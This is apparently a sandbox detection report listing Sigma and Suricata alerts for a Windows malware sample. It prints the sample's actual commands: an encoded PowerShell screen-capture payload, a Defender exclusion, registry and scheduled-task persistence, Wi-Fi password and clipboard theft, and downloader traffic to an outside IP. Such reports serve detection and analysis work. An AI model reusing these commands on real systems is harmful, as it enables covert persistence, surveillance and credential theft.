Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 7696, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7744, ProcessName: wscript.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe, ParentProcessId: 7636, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 7696, ProcessName: svchost.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 7696, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7744, ProcessName: wscript.exe

Sigma detected: Windows Binaries Write Suspicious Extensions

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\svchost.exe, ProcessId: 7696, TargetFilename: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\Logs\SettingSync\cmd.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\Logs\SettingSync\cmd.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7412, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe", ParentImage: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ParentProcessId: 7412, ParentProcessName: ChainComServermonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.cmdline", ProcessId: 7504, ProcessName: csc.exe

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7556, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7332, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /f, CommandLine: schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe", ParentImage: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ParentProcessId: 7412, ParentProcessName: ChainComServermonitor.exe, ProcessCommandLine: schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /f, ProcessId: 3596, ProcessName: schtasks.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe, ParentProcessId: 7636, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 7696, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 7696, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7744, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7412, TargetFilename: C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7752, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe', ProcessId: 7884, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe, ParentProcessId: 7636, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 7696, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe", ParentImage: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ParentProcessId: 7412, ParentProcessName: ChainComServermonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.cmdline", ProcessId: 7504, ProcessName: csc.exe

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7556, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7620, ProcessName: cmd.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:50:52.541191+0200
SID:	2803305
Severity:	3
Source Port:	56203
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:30.839903+0200
SID:	2803305
Severity:	3
Source Port:	56244
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:25.164189+0200
SID:	2803305
Severity:	3
Source Port:	56236
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:13.302113+0200
SID:	2803305
Severity:	3
Source Port:	56220
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:52:00.409109+0200
SID:	2803305
Severity:	3
Source Port:	56275
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:23.099579+0200
SID:	2803305
Severity:	3
Source Port:	56234
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:19.382934+0200
SID:	2803305
Severity:	3
Source Port:	56227
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:50:46.810747+0200
SID:	2803305
Severity:	3
Source Port:	56198
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:50:43.205047+0200
SID:	2803305
Severity:	3
Source Port:	56195
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:56.755719+0200
SID:	2803305
Severity:	3
Source Port:	56271
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:27.088228+0200
SID:	2803305
Severity:	3
Source Port:	56240
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:54.894920+0200
SID:	2803305
Severity:	3
Source Port:	56269
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:28.947186+0200
SID:	2803305
Severity:	3
Source Port:	56242
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:43.332187+0200
SID:	2803305
Severity:	3
Source Port:	56256
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:17.524543+0200
SID:	2803305
Severity:	3
Source Port:	56224
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:32.612514+0200
SID:	2803305
Severity:	3
Source Port:	56245
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:27.008615+0200
SID:	2803305
Severity:	3
Source Port:	56239
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:05.620714+0200
SID:	2803305
Severity:	3
Source Port:	56211
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:58.632168+0200
SID:	2803305
Severity:	3
Source Port:	56274
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:53.016944+0200
SID:	2803305
Severity:	3
